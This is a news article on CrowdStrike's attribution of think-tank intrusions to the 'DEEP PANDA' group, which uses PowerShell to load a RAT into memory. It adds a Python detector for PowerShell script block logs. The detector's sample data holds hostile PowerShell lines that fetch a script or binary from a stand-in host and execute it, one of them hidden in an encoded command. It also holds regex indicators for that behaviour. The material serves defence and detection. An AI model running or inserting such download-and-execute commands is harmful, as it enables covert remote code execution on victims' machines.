A nebulous group nicknamed "DEEP PANDA" by security researchers is said to be behind targeted intrusions against employees of US think tanks who work on the Middle East.
According to a CrowdStrike blog post, the attacks coincided with the deteriorating situation in Iraq and the wider Middle East. It highlights June 18, the day ISIS attacked the Baiji oil refinery, as the date the targeting of these individuals began.
The company's co-founder and CTO, Dmitri Alperovitch, says DEEP PANDA has ties to the Chinese government (he calls it a nation-state cyber intrusion group) and that the change of targets is a clear sign that China wants to know what the other parties involved in the region are likely to do.
CrowdStrike says DEEP PANDA uses PowerShell scripts to slip past traditional security products on the victim's computer: a script run by the built-in, signed interpreter draws far less attention than a dropped executable.
The scripts then load the MadHatter .NET Remote Access Tool (RAT) directly into memory, so nothing needs to be installed on the system's drive and there is no file on disk for antivirus to scan.
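The execution chain described above (a PowerShell launcher that fetches a .NET assembly and runs it from memory) leaves traces in PowerShell script block logs, which is where a defender would look for it. The script below is an added example written for this page, not code from the CrowdStrike post and not derived from the MadHatter sample: it scores constructed script-block text against generic indicators of encoded, hidden, download-and-reflectively-load PowerShell. The indicator patterns, weights, alert threshold and sample lines are all this example's own assumptions; the log format is assumed to be the text of PowerShell script block logging events (Event ID 4104) exported one block per string.

```python
import base64
import binascii
import re

# Indicators of the execution pattern discussed above. Patterns and weights
# are this example's assumptions, not CrowdStrike's detection rules.
INDICATORS = [
    (r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", "encoded command", 2),
    (r"-ex(?:ecutionpolicy)?\s+bypass", "execution policy bypass", 1),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window", 1),
    (r"\[(?:system\.)?reflection\.assembly\]::load", "reflective assembly load", 3),
    (r"\biex\b|invoke-expression", "invoke-expression", 2),
    (r"net\.webclient|downloadstring|downloaddata|invoke-webrequest", "network download", 2),
    (r"\[convert\]::frombase64string", "base64 decode", 1),
]

ALERT_THRESHOLD = 4  # assumption: blocks scoring at or above this are reported

# Constructed sample script blocks (not real DEEP PANDA artefacts). The second
# one carries its stage-two launcher as a UTF-16LE base64 -EncodedCommand,
# which is how PowerShell expects that argument to be encoded.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand " + ENCODED,
    "$b = (New-Object Net.WebClient).DownloadData('http://example.invalid/rat.bin'); "
    "[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null, $null)",
    "Import-Module ActiveDirectory; Get-ADUser -Filter * | Select-Object Name",
]


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or '' if none."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", text, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except (binascii.Error, ValueError):
        return ""


def score_script_block(text):
    """Score one script block; returns (score, [matched indicator names])."""
    hits = []
    score = 0
    # Scan the raw text and, when present, the decoded -EncodedCommand payload,
    # so that encoding the launcher does not hide the download and load stages.
    for candidate in (text, decode_encoded_command(text)):
        for pattern, name, weight in INDICATORS:
            if candidate and name not in hits and re.search(pattern, candidate, re.I):
                hits.append(name)
                score += weight
    return score, hits


def find_suspicious(blocks, threshold=ALERT_THRESHOLD):
    """Return (index, score, hits) for every block scoring at or above threshold."""
    results = []
    for i, block in enumerate(blocks):
        score, hits = score_script_block(block)
        if score >= threshold:
            results.append((i, score, hits))
    return results


if __name__ == "__main__":
    for index, score, hits in find_suspicious(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {index}: score {score}, indicators: {', '.join(hits)}")
```

Two design points matter here. Decoding the `-EncodedCommand` argument before scoring is what catches the launcher: the raw line only shows an encoded blob and a couple of command-line flags, while the decoded payload exposes the download-and-execute stage. And weighting a reflective assembly load highest reflects the point in the text: the RAT never touches disk, so the load call in the script log may be the only artefact a file-based product would have missed.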
According to Alperovitch, DEEP PANDA "presents a very serious threat not just to think tanks, but also multinational financial institutions, law firms, defense contractors, and government agencies", and the renewed interest in cash-strapped but well-connected not-for-profit organisations can only be a worrying sign.